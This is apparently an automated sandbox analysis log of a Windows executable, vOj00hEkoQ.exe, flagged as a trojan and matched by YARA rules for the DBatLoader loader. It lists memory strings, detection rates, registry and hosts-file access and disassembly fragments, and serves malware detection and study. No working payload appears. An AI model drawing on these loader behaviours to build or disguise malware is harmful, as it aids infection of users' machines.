                Source: vOj00hEkoQ.exe, 00000000.00000003.418871850.0000000005946000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.411084370.0000000004EA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.506234065.0000000000750000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.412411442.0000000005865000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.469073503.0000000005457000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.454328987.0000000005568000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.362672026.0000000005447000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.460466899.000000000537D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.507732936.0000000005A02000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.526493361.0000000005856000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.485866212.0000000000860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.456730184.0000000005481000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.529473239.000000000583C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.403902819.000000000498C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.392162065.00000000048F1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.427125573.0000000005852000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.512197295.000000000082E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.484562401.0000000005364000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.402869739.0000000004895000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.478715673.000000000538A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.413996918.0000000005876000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.513432828.000000000594D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.415639097.0000000005740000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.371330488.0000000005450000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.524437798.0000000005856000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.492810668.0000000005746000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.423486222.0000000005299000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.369820978.0000000005436000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.531799060.000000000593C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.448162227.00000000045A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.402860308.000000000487C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.408064437.00000000048C8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.425077630.00000000045A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.456689841.0000000005470000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.530874234.00000000007A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.402880603.00000000048A6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.457329038.0000000005562000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.482954669.00000000045B9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.530003732.0000000000790000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.499508522.0000000005830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.533685011.00000000007A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.378742570.0000000004796000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.416797440.000000000537E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.497321326.0000000005828000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.460074000.0000000004686000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.501286177.000000000082D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.419938415.0000000005965000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.381233715.00000000048A6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.483797553.00000000045A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.373361346.0000000005270000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.485391740.000000000583A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.363710236.000000000538E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.398912423.0000000004686000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.421890595.00000000058A9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.524242007.0000000005922000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.376414488.0000000004698000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.424700705.0000000004972000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.550960485.0000000005830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.357357072.00000000028C8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.517313225.0000000000858000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.380651385.00000000046B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.544279395.00000000007B2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.470628161.0000000005561000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.413119939.0000000005865000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.471876012.0000000005480000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.413133068.0000000005876000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.468103215.0000000005364000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.443794269.00000000045A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.513811557.0000000000748000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.502396056.000000000583C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.518973822.000000000079C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.487701016.0000000005746000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.567108783.00000000007D8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.418379107.0000000005865000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.375096550.0000000005370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.461655942.000000000497A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.379252550.00000000046C9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.513408746.0000000005934000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.508140768.0000000000760000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.545017986.00000000007DC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                Source: vOj00hEkoQ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeSection loaded: system.dll
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_028C9050
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_028C971F
                Source: vOj00hEkoQ.exeStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                Source: vOj00hEkoQ.exeVirustotal: Detection: 77%
                Source: vOj00hEkoQ.exeMetadefender: Detection: 48%
                Source: vOj00hEkoQ.exeReversingLabs: Detection: 57%
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeFile read: C:\Users\user\Desktop\vOj00hEkoQ.exeJump to behavior
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B091E540-83E3-11CF-A713-0020AFD79762}\InProcServer32
                Source: classification engineClassification label: mal84.troj.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

                Data Obfuscation

                barindex
                Yara detected DBatLoader
                Source: Yara matchFile source: vOj00hEkoQ.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.vOj00hEkoQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.392588116.0000000004686000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.446198402.0000000005459000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.373361346.0000000005270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.490854963.0000000005867000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.467333094.0000000005480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.458083719.0000000005496000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.375096550.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.456022736.000000000534F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.384404649.00000000047FB000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.421890595.00000000058A9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470742737.000000000538A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.526945257.0000000005867000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.401374110.0000000004684000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.405069389.0000000004768000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.413452133.0000000005724000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.449064329.000000000537C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.452539340.0000000005364000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.425810513.0000000005852000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.481942578.000000000543B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.508537851.0000000005935000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.372707185.0000000005470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.356239685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.464356911.00000000054A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.451399152.0000000004983000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.381326351.00000000046DA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.399740861.0000000004781000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.479431451.000000000535E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.474528340.00000000054A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_028CBC13 push 004A38A0h; ret
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_028C9833 push 004A14B3h; ret
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_028CBC57 push 004A38D2h; ret
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_028CBB9B push 004A3816h; ret
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_028CBBC7 push 004A385Eh; ret
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_028C8D03 push 004A0C11h; ret
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_028CBD7F push 380043CAh; retf 0043h
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_02957297 push ebx; ret
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_0294D28C push cs; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_0294F2B9 push cs; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_029572AE push edi; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_0294E2D7 pushad ; ret
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_029572DD push es; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_029492DD push esp; ret
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_0294F2C8 push eax; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_029562FB pushad ; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_029532E6 push cs; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_029582EA pushad ; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_02956228 pushad ; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_0295125E push 446484C9h; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_02952259 pushad ; ret
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_0294E26C pushad ; ret
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_02956393 pushad ; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_02956393 pushad ; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_0294A3B4 push ss; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_029493C7 push ss; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_029533C6 pushad ; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_02957310 push es; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_0294933F push eax; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_0294D339 push es; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeCode function: 0_3_02956350 pushad ; retf
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
